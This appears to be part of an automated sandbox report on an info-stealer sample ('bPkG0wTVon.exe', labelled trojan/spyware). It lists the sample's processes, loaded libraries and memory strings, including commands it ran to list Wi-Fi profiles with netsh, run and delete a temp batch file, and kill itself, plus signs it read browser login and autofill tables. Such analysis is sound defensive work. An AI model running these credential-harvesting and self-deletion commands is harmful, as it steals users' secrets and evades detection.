          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08256FE00_2_08256FE0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825C8E80_2_0825C8E8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825EDC00_2_0825EDC0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08251A300_2_08251A30
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825C8E80_2_0825C8E8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825CF570_2_0825CF57
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825C8A10_2_0825C8A1
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_0825EC980_2_0825EC98
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08256FD10_2_08256FD1
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082AF49A0_2_082AF49A
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082AC5100_2_082AC510
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A5E680_2_082A5E68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A7AE00_2_082A7AE0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A65C00_2_082A65C0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A76400_2_082A7640
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A97580_2_082A9758
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A20500_2_082A2050
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082AADB80_2_082AADB8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A4A380_2_082A4A38
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082AB00A0_2_082AB00A
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A0A800_2_082A0A80
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082AEB980_2_082AEB98
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082ADE9E0_2_082ADE9E
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A0A900_2_082A0A90
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A9EE00_2_082A9EE0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082AA9600_2_082AA960
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A13F00_2_082A13F0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A10C80_2_082A10C8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A97480_2_082A9748
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A00400_2_082A0040
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A0FC70_2_082A0FC7
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082A7AD20_2_082A7AD2
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_082AA8500_2_082AA850
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083144180_2_08314418
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083142600_2_08314260
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083158410_2_08315841
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083100400_2_08310040
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083100120_2_08310012
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08312A580_2_08312A58
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_08312A460_2_08312A46
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B38660_2_083B3866
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BB4A80_2_083BB4A8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B08F00_2_083B08F0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BF1200_2_083BF120
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BFDA00_2_083BFDA0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B4D950_2_083B4D95
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B2A400_2_083B2A40
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BEAB80_2_083BEAB8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BE3300_2_083BE330
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B7B100_2_083B7B10
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B57900_2_083B5790
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B33E20_2_083B33E2
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B001E0_2_083B001E
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BC0780_2_083BC078
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BE0600_2_083BE060
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B00400_2_083B0040
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BD8B00_2_083BD8B0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BCC970_2_083BCC97
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B08EA0_2_083B08EA
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BECD80_2_083BECD8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BCCD80_2_083BCCD8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BECC80_2_083BECC8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B18C00_2_083B18C0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B15320_2_083B1532
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B21780_2_083B2178
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B2D980_2_083B2D98
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BFD900_2_083BFD90
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B21880_2_083B2188
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BC9F80_2_083BC9F8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B2A300_2_083B2A30
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B02E00_2_083B02E0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BCB3C0_2_083BCB3C
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BCB280_2_083BCB28
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B1B020_2_083B1B02
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B57640_2_083B5764
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BBB400_2_083BBB40
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B8FA00_2_083B8FA0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083BDB800_2_083BDB80
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B8FE00_2_083B8FE0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B3FD00_2_083B3FD0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B8BD00_2_083B8BD0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E24580_2_085E2458
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E00400_2_085E0040
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E5A780_2_085E5A78
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E5C190_2_085E5C19
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E520B0_2_085E520B
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085EF4D80_2_085EF4D8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E5ED50_2_085E5ED5
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E96D00_2_085E96D0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E7AE80_2_085E7AE8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E6EE80_2_085E6EE8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085EBE880_2_085EBE88
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E5D500_2_085E5D50
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E83480_2_085E8348
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E45F00_2_085E45F0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E75900_2_085E7590
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E4E520_2_085E4E52
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E622C0_2_085E622C
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085EEC200_2_085EEC20
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E6EDA0_2_085E6EDA
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085EF4C70_2_085EF4C7
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E66E80_2_085E66E8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E9EE30_2_085E9EE3
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E189F0_2_085E189F
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E9ABD0_2_085E9ABD
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E4AA50_2_085E4AA5
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E62A00_2_085E62A0
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E755D0_2_085E755D
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E57420_2_085E5742
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E7B410_2_085E7B41
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E616F0_2_085E616F
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E1D680_2_085E1D68
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085EC7080_2_085EC708
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085EAFD80_2_085EAFD8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085EEFE80_2_085EEFE8
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_085E57880_2_085E5788
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeCode function: 0_2_083B57800_2_083B5780
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8592 -s 3592
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs bPkG0wTVon.exe
          Source: bPkG0wTVon.exe, 00000000.00000002.1512294678.000000006FEEB000.00000020.00000001.01000000.00000007.sdmp | Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs bPkG0wTVon.exe
          Source: bPkG0wTVon.exe, 00000000.00000002.1493209045.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs bPkG0wTVon.exe
          Source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs bPkG0wTVon.exe
          Source: bPkG0wTVon.exe, 00000000.00000002.1524377559.0000000070BEB000.00000020.00000001.01000000.00000006.sdmp | Binary or memory string: lastOriginalFileName vs bPkG0wTVon.exe
          Source: bPkG0wTVon.exe, 00000000.00000000.1310881238.0000000000398000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameArcana.exe. vs bPkG0wTVon.exe
          Source: bPkG0wTVon.exe | Binary or memory string: OriginalFilenameArcana.exe. vs bPkG0wTVon.exe
          Source: bPkG0wTVon.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: bPkG0wTVon.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@25/21@2/2
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Code function: 0_2_05DFF0D0 CreateToolhelp32Snapshot
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:304:WilStaging_02
          Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8592
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:524:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:524:120:WilError_03
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | File created: C:\Users\user\AppData\Local\Temp\lljh0ipr.tbf
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat
          Source: bPkG0wTVon.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
          Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
          Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 8592)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C6000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp919C.tmp.dat.0.dr | Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002915000.00000004.00000800.00020000.00000000.sdmp, tmp919B.tmp.dat.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039FC000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, tmp918A.tmp.dat.0.dr, tmp9189.tmp.dat.0.dr, tmp9188.tmp.dat.0.dr | Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
          Source: bPkG0wTVon.exe | Virustotal: Detection: 30%
          Source: bPkG0wTVon.exe | ReversingLabs: Detection: 52%
          Source: unknown | Process created: C:\Users\user\Desktop\bPkG0wTVon.exe "C:\Users\user\Desktop\bPkG0wTVon.exe"
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 8592
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8592 -s 3592
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 8592
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: mscoree.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: napinsp.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: pnrpnsp.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: wshbth.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: nlaapi.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: winrnr.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: wbemcomn.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: rasapi32.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: rasman.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: rtutils.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: edputil.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: dwrite.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: windowscodecs.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: dpapi.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: appresolver.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: bcp47langs.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: slc.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: sppc.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: edgegdi.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\chcp.com | Section loaded: ulib.dll
          Source: C:\Windows\SysWOW64\chcp.com | Section loaded: fsutilext.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: edgegdi.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
